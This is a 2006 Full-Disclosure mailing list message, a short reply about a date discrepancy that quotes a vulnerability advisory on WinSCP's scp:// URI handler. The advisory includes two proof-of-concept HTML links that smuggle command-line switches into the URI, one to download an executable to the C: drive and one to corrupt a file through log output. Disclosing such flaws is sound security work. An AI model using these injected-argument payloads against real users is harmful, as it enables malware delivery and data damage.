lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <4999548.192521150033022014.JavaMail.juha-matti.laurio@netti.fi>
Date: Sun Jun 11 14:37:11 2006
From: juha-matti.laurio at netti.fi (Juha-Matti Laurio)
Subject: WinSCP - URI Handler Command Switch Parsing

Your e-mail has the following Date field:
Fri, 10 Mar 2006 21:24:12 +0100

My e-mail client says 'Sent: 10.3.2006 22:24:12' because of this.

Archive puts it to Jun 11th, however:
http://lists.grok.org.uk/pipermail/full-disclosure/2006-June/046810.html

- Juha-Matti


Jelmer Kuperus <jkuperus@...net.nl> kirjoitti: 
> 
> WinSCP - URI Handler Command Switch Parsing
> 
> About winscp :
> 
> WinSCP is an open source freeware SFTP client for Windows using SSH.
> Legacy SCP protocol is also supported. Its main function is safe copying
> of files between a local and a remote computer.
> 
> Versions affected :
> 
> It was tested on WinSCP 3.8.1 , previous versions may or may not be
> affected
> 
> Description :
> 
> During a typical installation of winscp several URI handlers are
> installed. (scp:// sftp://) It is possible to include additional command
> line switches to be passed to winscp
> 
> Some of these switches may initiate  a file transfer, sending a
> specified file to an arbitrary ftp. or they may download executables to
> a location on a pc where they would be executed. eg. the startup folder
> 
> If you create an html page with these contents
> 
> <a href="scp://user:password@...t:22/%22%20/console%20/command%20%22lcd%
> 20c:\%22%20%22get%201.exe%22%20exit">download malware.exe</a>
> 
> And click on the link it would automatically download malware.exe to a
> c:\ (asuming the host is in the cache otherwise user interaction is
> required)
> 
> clicking on
> 
> <a href="scp://jelmer@....0.0.1:22/%22%20%22/log=c:%5csomefile%
> 22"log</a>
> 
> would append log output to c:\somefile possibly rendering the file
> unusable in the process. Note that this also works when the host is not
> in the cache
> 
> Vendor status :
> 
> Martin Prikryl was notified June 04, 2006, He will "think about a
> solution"
> 
> 
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ